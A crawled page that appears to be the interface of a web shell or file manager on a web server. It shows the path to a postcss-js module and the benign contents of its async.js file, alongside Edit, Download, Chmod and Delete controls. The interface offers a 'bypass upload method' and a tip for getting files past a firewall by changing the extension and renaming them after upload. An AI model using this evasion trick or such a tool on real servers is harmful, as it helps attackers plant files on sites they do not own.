Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
var
www
gtechmarathon2026.bitkit.dk
httpdocs
node_modules
postcss-js
File Content:
async.js
let postcss = require('postcss') let processResult = require('./process-result') let parse = require('./parser') module.exports = function async(plugins) { let processor = postcss(plugins) return async input => { let result = await processor.process(input, { parser: parse, from: undefined }) return processResult(result) } }
Edit
Download
Unzip
Chmod
Delete